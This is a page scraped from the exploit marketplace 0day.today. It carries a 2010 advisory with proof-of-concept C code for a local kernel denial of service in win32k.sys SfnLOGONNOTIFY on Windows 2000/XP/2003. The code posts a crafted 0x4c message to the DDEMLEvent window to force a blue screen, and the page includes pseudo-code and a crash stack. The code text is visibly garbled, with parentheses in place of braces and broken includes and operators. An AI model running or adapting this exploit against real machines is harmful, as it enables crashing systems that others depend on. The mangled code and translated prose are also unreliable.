0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY local kernel DoS

Author

MJ0011

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

===========================================================================================
Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY local kernel Denial of Service Vulnerability
===========================================================================================

Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY local kernel Denial of Service Vulnerability
 
Effect : Microsoft Windows 2000/XP/2003 full patch
 
 
Author:MJ0011
Published: 2010-04-22
 
 
Vulnerability Details:
 
Win32k.sys in DispatchMessage when the last call to xxxDefWindowProc, this function in dealing with some
Message, will call gapfnScSendMessage this function table function to process, which under the deal 2000/xp/2003
0x4c No. message, there will be a function called SfnLOGONNOTIFY, this function again when the wParam == 4/13/12
When the data directly from the lParam inside out, despite the use of the function of the SEH, but as long as the kernel passes the wrong address, will still lead to
BSOD
 
Pseudo-code:
 
if (wParam == 4 | | wParam == 13 | | wParam == 12)
(
    v18 = * (_DWORD *) lParam;
    v19 = * (_DWORD *) (lParam 4);
    v20 = * (_DWORD *) (lParam 8);
    v21 = * (_DWORD *) (lParam 12);
 
Exploit code:
 
# Include "stdafx.h"
# Include "windows.h"
int main (int argc, char * argv [])
(
printf("Microsoft Windows Win32k.sys SfnLOGONNOTIFY Local D.O.S Vuln\nBy MJ0011\nth_decoder@126.com\nPressEnter");
 
getchar();
 
HWND hwnd = FindWindow ("DDEMLEvent", NULL);
 
if (hwnd == 0)
(
   printf ("cannot find DDEMLEvent Window! \ n");
   return 0;
)
 
PostMessage (hwnd, 0x4c, 0x4, 0x80000000);
 
 
return 0;
)
 
Common crash stack:
 
kd> kc
 
win32k! SfnLOGONNOTIFY
win32k! xxxDefWindowProc
win32k! xxxEventWndProc
win32k! xxxDispatchMessage
win32k! NtUserDispatchMessage
....
 
Windows 7/Vista no such problem
 
Thanks:
 
Thanks to my colleagues LYL to help me discovered this vulnerability 



#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY local kernel DoS

Report Error

Report Error